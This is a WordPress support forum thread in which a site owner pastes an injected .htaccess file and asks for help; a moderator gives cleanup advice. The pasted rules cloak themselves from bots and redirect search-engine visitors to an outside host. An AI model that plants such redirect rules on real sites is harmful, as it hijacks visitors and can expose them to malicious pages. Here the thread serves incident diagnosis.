Title: .htaccess Attack! Last modified: August 19, 2016 --- # .htaccess Attack! * [welshhuw](https://wordpress.org/support/users/welshhuw/) * (@welshhuw) * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/) * Hi, * I have been finding some .htaccess files containg the following within my wordpress installation. Also, we have another 20ish sites on the same server, and the files have appeared there too. (These sites are html/css sites run on our custom cms) * _RewriteEngine On RewriteCond %{REQUEST\_METHOD} ^GET$ RewriteCond %{HTTP\_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\. |altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.| lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$[ NC] RewriteCond %{HTTP\_REFERER} !^.*(q\=cache\:).*$ [NC] RewriteCond %{HTTP\ _USER\_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).* $ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias |Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*( Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).* $ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork |cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT}! ^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD| Friendster|****\sYou|Google).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Gregarius |HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] RewriteCond%{ HTTP\_USER\_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX |Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Krugle|Labrador |larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] RewriteCond %{HTTP\_USER\ _AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\\ _PowerPC).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Mac\\_PPC|Mac\s10|Mac\ sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC] RewriteCond %{ HTTP\_USER\_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy |NewsFire).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(NewsGatorOnline|NewsMacPro |Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT}! ^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation |POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*( psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient |Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(spider |sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] RewriteCond %{ HTTP\_USER\_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler |urllib|Validator).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(Vienna|voyager |W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond%{ HTTP\_USER\_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE |Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP\_USER\_AGENT} !^.*(WinHTTP|WinNT4 |WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] RewriteCond %{HTTP\_USER\ _AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{HTTP\ _COOKIE} !^.*xccgtswgokoe.*$ RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ [http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%](http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%){ HTTP\_HOST}&u=%{REQUEST\_URI}&q=%{QUERY\_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe: 1:%{HTTP\_HOST}:10080:/:0:HttpOnly] # exgocgkctswo * I have been deleting the infected files but can someone help me shed some light on what it is and how it got there! My server guys are saying it something to do with a WP plugin? * Thanks Viewing 6 replies - 1 through 6 (of 6 total) * Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * (@ipstenu) * 🏳️‍🌈 Advisor and Activist * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749193) * Well … what plugins are you running? * It looks more like a server hack to me, but it could be a bad plugin, so start by disabling and deleting the ones you don’t need AND changing your server and wordpress passwords. Just in case. * Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/) * (@welshhuw) * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749202) * Hi, * Thanks for your reply. Here is the list of plugins I have running. Over about 5 WP installations. * _Akismet All In One Seo Pack Google XML Sitemaps wp Smush.it Automatic SEO links cForms Featured Content Gallery Super Image Plugin Video Widget WP Security Scan FeedWordpress TDO Mini Forms * I have deleted and disable the ones I wasnt using and didnt need. * Any advice on where this could’ve come from would be grateful!! * Thanks again. * Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * (@ipstenu) * 🏳️‍🌈 Advisor and Activist * [15 years, 7 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749210) * None of those should be causing this behavior. * Read this: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) * Your server may be under attack. * Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/) * (@welshhuw) * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749381) * Thanks but the server guys are abs. positive its due to plugins…!? * Have deleted all infected files and checked all plugins are up to date. * Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * (@ipstenu) * 🏳️‍🌈 Advisor and Activist * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749385) * Yeah, a lot of the times server guys are 100% sure it’s plugins. Generally it’s not. I mean, yes, SOME plugins are made by hackers, but it’s more common that a botched plugin install leaves your server insecure, which opens you to server hacks. And even more common than THAT is a server insecure on a level you, as a user, cannot fix, and your host must. * Change your server password, your database password, and your blog passwords. * Check the folder/file permissions on your account. Do the best you can. * Thread Starter [welshhuw](https://wordpress.org/support/users/welshhuw/) * (@welshhuw) * [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749421) * Did all of the above and now its back!! * But what I can figure out is that the infected files have a later date than when I cleaned them all out??? * I know I would have deleted/cleaned them out so is it possible for them to ‘back- date’ the infected files? Viewing 6 replies - 1 through 6 (of 6 total) The topic ‘.htaccess Attack!’ is closed to new replies. ## Tags * [attack](https://wordpress.org/support/topic-tag/attack/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 6 replies * 2 participants * Last reply from: [welshhuw](https://wordpress.org/support/users/welshhuw/) * Last activity: [15 years, 6 months ago](https://wordpress.org/support/topic/htaccess-attack/#post-1749421) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics